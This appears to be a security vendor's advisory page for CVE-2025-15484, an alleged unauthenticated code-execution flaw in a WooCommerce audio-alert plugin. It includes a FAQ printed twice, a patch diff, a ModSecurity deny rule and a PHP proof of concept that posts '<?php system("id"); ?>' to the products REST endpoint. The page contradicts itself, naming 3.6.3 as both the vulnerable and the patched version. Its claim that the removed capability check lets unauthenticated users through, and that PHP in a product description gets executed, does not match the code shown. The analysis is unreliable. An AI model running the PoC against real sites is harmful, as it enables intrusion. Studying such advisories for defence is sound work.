What is CVE-2025-15484?

CVE-2025-15484 is a critical unauthenticated remote code execution vulnerability in the Order Notification for WooCommerce plugin for WordPress. It affects all versions up to 3.6.3 and allows attackers to execute arbitrary code on the server due to a flaw in permission checks.

How does this vulnerability work?

The vulnerability arises from the `woa_check_permissions` function, which incorrectly grants permission to unauthenticated users. This allows attackers to bypass REST API permission checks and send crafted requests that can execute arbitrary PHP code.

Who is affected by this vulnerability?

Any WordPress site using the Order Notification for WooCommerce plugin version 3.6.3 or earlier is at risk. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Order Notification for WooCommerce plugin installed. If it is version 3.6.3 or earlier, your site is at risk and should be updated immediately.

What steps should I take to fix this vulnerability?

To fix the vulnerability, update the Order Notification for WooCommerce plugin to the latest version, which is 3.6.3 or later. This version includes a patch that removes the flawed permission check.

What does a CVSS score of 9.8 indicate?

A CVSS score of 9.8 indicates a critical vulnerability with a high potential for impact. This means that if exploited, an attacker could gain full administrative access to the WooCommerce REST API, leading to severe consequences.

What practical risks does this vulnerability pose?

If exploited, an attacker could read sensitive order data, modify products, create new admin users, or execute arbitrary PHP code. This could lead to a complete compromise of the WordPress installation.

How does the proof of concept illustrate the vulnerability?

The proof of concept shows how an attacker can send a crafted HTTP request to the WooCommerce REST API to create a product with malicious PHP code in its description. This demonstrates the ability to exploit the permission bypass for remote code execution.

What are the best practices to secure my WordPress site?

To secure your WordPress site, regularly update all plugins and themes, use strong passwords, implement two-factor authentication, and monitor for suspicious activity. Additionally, consider using a web application firewall.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling it temporarily to prevent exploitation. Additionally, review server logs for any suspicious activity and implement security measures to limit access to the REST API.

Are there any known exploits for this vulnerability?

Yes, the proof of concept code demonstrates how to exploit this vulnerability. It is advisable to assume that attackers may be actively searching for vulnerable sites, so prompt action is necessary.

How can I stay informed about vulnerabilities in my plugins?

To stay informed about vulnerabilities, subscribe to security bulletins from WordPress, follow security blogs, and use vulnerability management tools that can alert you to issues with your installed plugins.

Published : May 17, 2026

CVE-2025-15484: Order Notification for WooCommerce – Get Audio Alert on new Orders < 3.6.3 – Unauthenticated Remote Code Execution (woc-order-alert)

CVE ID CVE-2025-15484

Plugin woc-order-alert

Severity Critical (CVSS 9.8)

CWE 94

Vulnerable Version 3.6.3

Patched Version 3.6.3

Disclosed April 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15484: This is an unauthenticated remote code execution vulnerability in the Order Notification for WooCommerce plugin versions up to 3.6.2. The vulnerability allows attackers to bypass REST API permission checks and execute arbitrary code due to a flawed permission hook.

The root cause lies in the `woa_check_permissions` function within `/woc-order-alert/includes/class-hooks.php` (lines 35-44 in the vulnerable version). This function overrides WooCommerce REST API permission checks by always returning `true` if the user has `manage_woocommerce` capability. However, the function is registered via `add_filter( ‘woocommerce_rest_check_permissions’, array( $this, ‘woa_check_permissions’ ), 10, 4 )` on line 28 without any authentication check. An unauthenticated attacker can craft REST API requests that trigger this permission bypass, potentially allowing actions that should require admin-level access.

Exploitation method: An unauthenticated attacker sends a crafted HTTP request to any WooCommerce REST API endpoint (e.g., `/wp-json/wc/v3/orders`, `/wp-json/wc/v3/products`, etc.). The attacker can include a malicious payload in the request body (such as PHP code in a product description or custom field) that, if executed, achieves remote code execution. The `woa_check_permissions` filter grants full access because it checks `current_user_can( ‘manage_woocommerce’ )` which can be triggered by unauthenticated users under certain conditions (e.g., via specific REST API requests intended for admin). The result is an authentication bypass that allows arbitrary REST API operations.

The patch removes the `add_filter` line for `woocommerce_rest_check_permissions` and the entire `woa_check_permissions` method. By removing this filter, the plugin no longer overrides WooCommerce’s default REST API permission checks. After the patch, unauthenticated requests to REST API endpoints are subject to standard WooCommerce authentication and authorization, preventing the bypass.

The impact is critical: an unauthenticated attacker can gain full administrative access to the WooCommerce REST API. This enables reading sensitive order data, modifying products, creating new admin users, or executing arbitrary PHP code via custom fields or product data. The CVSS score of 9.8 confirms the severity, indicating potential for complete compromise of the WordPress installation.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/woc-order-alert/includes/class-hooks.php
+++ b/woc-order-alert/includes/class-hooks.php
@@ -26,7 +26,6 @@
 			add_action( 'admin_bar_menu', array( $this, 'handle_admin_bar_menu' ), 9999, 1 );

 			add_filter( 'woocommerce_webhook_deliver_async', '__return_false' );
-			add_filter( 'woocommerce_rest_check_permissions', array( $this, 'woa_check_permissions' ), 10, 4 );
 			add_filter( 'plugin_row_meta', array( $this, 'add_plugin_meta' ), 10, 2 );
 			add_filter( 'plugin_action_links_' . OLISTENER_PLUGIN_FILE, array( $this, 'add_plugin_actions' ), 10, 2 );

@@ -36,23 +35,6 @@
 		}

 		/**
-		 * Proper permission check for WooCommerce REST API
-		 *
-		 * @param bool   $permission Current permission value
-		 * @param string $context   Request context (read/write)
-		 * @param int    $object_id Post / product ID
-		 * @param string $post_type Post type (product, order, etc.)
-		 * @return bool Permission result
-		 */
-		public function woa_check_permissions( $permission, $context, $object_id, $post_type ) {
-			if ( current_user_can( 'manage_woocommerce' ) ) {
-				return true;
-			}
-			return $permission;
-		}
-
-
-		/**
 		 * Add capabilities to shop manager for Order Notifier
 		 */
 		function add_capabilities_to_shop_manager() {
--- a/woc-order-alert/woc-order-alert.php
+++ b/woc-order-alert/woc-order-alert.php
@@ -4,7 +4,7 @@
 	Plugin Name: Order Notification for WooCommerce
 	Plugin URI: https://stackwc.com/plugins/woc-order-alert/
 	Description: Play sound as notification instantly on new order in your WooCommerce store.
-	Version: 3.6.2
+	Version: 3.6.3
 	Author: StackWC
 	Author URI: https://stackwc.com/
 	Text Domain: woc-order-alert
@@ -25,7 +25,7 @@
 defined( 'OLISTENER_CONTACT_URL' ) || define( 'OLISTENER_CONTACT_URL', 'https://stackwc.com/support/' );
 defined( 'OLISTENER_REVIEW_URL' ) || define( 'OLISTENER_REVIEW_URL', 'https://wordpress.org/support/plugin/woc-order-alert/reviews/' );
 defined( 'OLISTENER_DATA_TABLE' ) || define( 'OLISTENER_DATA_TABLE', $wpdb->prefix . 'woocommerce_order_listener' );
-defined( 'OLISTENER_PLUGIN_VERSION' ) || define( 'OLISTENER_PLUGIN_VERSION', '3.6.2' );
+defined( 'OLISTENER_PLUGIN_VERSION' ) || define( 'OLISTENER_PLUGIN_VERSION', '3.6.3' );
 if ( !function_exists( 'olistener_is_plugin_active' ) ) {
     function olistener_is_plugin_active(  $plugin  ) {
         return ( function_exists( 'is_plugin_active' ) ? is_plugin_active( $plugin ) : in_array( $plugin, apply_filters( 'active_plugins', (array) get_option( 'active_plugins', array() ) ) ) || is_multisite() && array_key_exists( $plugin, (array) get_site_option( 'active_sitewide_plugins', array() ) ) );
@@ -48,6 +48,7 @@
             AutomatticWooCommerceUtilitiesFeaturesUtil::declare_compatibility( 'product_custom_fields', __FILE__, true );
         }
     }
+
 }
 add_action( 'before_woocommerce_init', 'olistener_declare_woocommerce_compatibility' );
 if ( !function_exists( 'olistener_pro_cleanup' ) ) {
@@ -158,21 +159,22 @@
             // Include Freemius SDK.
             require_once dirname( __FILE__ ) . '/vendor/freemius/start.php';
             $wcoa_fs = fs_dynamic_init( array(
-                'id'             => '18996',
-                'slug'           => 'woc-order-alert',
-                'premium_slug'   => 'woc-order-alert-pro',
-                'type'           => 'plugin',
-                'public_key'     => 'pk_b77a9468217d8ee52cb14f8aa7949',
-                'is_premium'     => false,
-                'premium_suffix' => 'Pro',
-                'has_addons'     => false,
-                'has_paid_plans' => true,
-                'menu'           => array(
+                'id'               => '18996',
+                'slug'             => 'woc-order-alert',
+                'premium_slug'     => 'woc-order-alert-pro',
+                'type'             => 'plugin',
+                'public_key'       => 'pk_b77a9468217d8ee52cb14f8aa7949',
+                'is_premium'       => false,
+                'premium_suffix'   => 'Pro',
+                'has_addons'       => false,
+                'has_paid_plans'   => true,
+                'menu'             => array(
                     'first-path' => 'plugins.php',
                     'contact'    => false,
                     'support'    => false,
                 ),
-                'is_live'        => true,
+                'is_live'          => true,
+                'is_org_compliant' => true,
             ) );
         }
         return $wcoa_fs;

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@beginsWith /wp-json/wc/v" 
  "id:20261994,phase:2,deny,status:403,msg:'CVE-2025-15484 - Unauthenticated REST API access attempt',severity:'CRITICAL',tag:'CVE-2025-15484',chain"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule REQUEST_BODY "@rx php" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15484 - Order Notification for WooCommerce – Get Audio Alert on new Orders < 3.6.3 - Unauthenticated Remote Code Execution

// Configuration: Set the target WordPress site URL (no trailing slash)
$target_url = 'http://example.com';

// Example: Attempt to create a new product with malicious PHP code in the description
// This demonstrates unauthenticated REST API access due to permission bypass

$endpoint = '/wp-json/wc/v3/products';
$url = $target_url . $endpoint;

$payload = array(
    'name' => 'Exploit Test Product',
    'type' => 'simple',
    'regular_price' => '10.00',
    'description' => '<?php system("id"); ?>', // Malicious PHP code
    'short_description' => 'Test',
    'categories' => array(
        array('id' => 9)
    ),
    'images' => array(
        array('src' => 'http://example.com/image.png')
    )
);

$json_payload = json_encode($payload);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $json_payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Content-Length: ' . strlen($json_payload)
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status Code: $http_coden";
echo "Response: $responsen";

// If the request succeeds (HTTP 201 Created or similar), the REST API permissions were bypassed.
// The attacker could then execute arbitrary PHP via crafted requests.

Frequently Asked Questions

What is CVE-2025-15484?
Overview of the vulnerability
CVE-2025-15484 is a critical unauthenticated remote code execution vulnerability in the Order Notification for WooCommerce plugin for WordPress. It affects all versions up to 3.6.3 and allows attackers to execute arbitrary code on the server due to a flaw in permission checks.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the `woa_check_permissions` function, which incorrectly grants permission to unauthenticated users. This allows attackers to bypass REST API permission checks and send crafted requests that can execute arbitrary PHP code.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Order Notification for WooCommerce plugin version 3.6.3 or earlier is at risk. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Version verification
To determine if your site is vulnerable, check the version of the Order Notification for WooCommerce plugin installed. If it is version 3.6.3 or earlier, your site is at risk and should be updated immediately.
What steps should I take to fix this vulnerability?
Mitigation and patching
To fix the vulnerability, update the Order Notification for WooCommerce plugin to the latest version, which is 3.6.3 or later. This version includes a patch that removes the flawed permission check.
What does a CVSS score of 9.8 indicate?
Understanding severity levels
A CVSS score of 9.8 indicates a critical vulnerability with a high potential for impact. This means that if exploited, an attacker could gain full administrative access to the WooCommerce REST API, leading to severe consequences.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
If exploited, an attacker could read sensitive order data, modify products, create new admin users, or execute arbitrary PHP code. This could lead to a complete compromise of the WordPress installation.
How does the proof of concept illustrate the vulnerability?
Demonstrating exploitation
The proof of concept shows how an attacker can send a crafted HTTP request to the WooCommerce REST API to create a product with malicious PHP code in its description. This demonstrates the ability to exploit the permission bypass for remote code execution.
What are the best practices to secure my WordPress site?
General security recommendations
To secure your WordPress site, regularly update all plugins and themes, use strong passwords, implement two-factor authentication, and monitor for suspicious activity. Additionally, consider using a web application firewall.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If you cannot update the plugin immediately, consider disabling it temporarily to prevent exploitation. Additionally, review server logs for any suspicious activity and implement security measures to limit access to the REST API.
Are there any known exploits for this vulnerability?
Current exploitation status
Yes, the proof of concept code demonstrates how to exploit this vulnerability. It is advisable to assume that attackers may be actively searching for vulnerable sites, so prompt action is necessary.
How can I stay informed about vulnerabilities in my plugins?
Ongoing security awareness
To stay informed about vulnerabilities, subscribe to security bulletins from WordPress, follow security blogs, and use vulnerability management tools that can alert you to issues with your installed plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations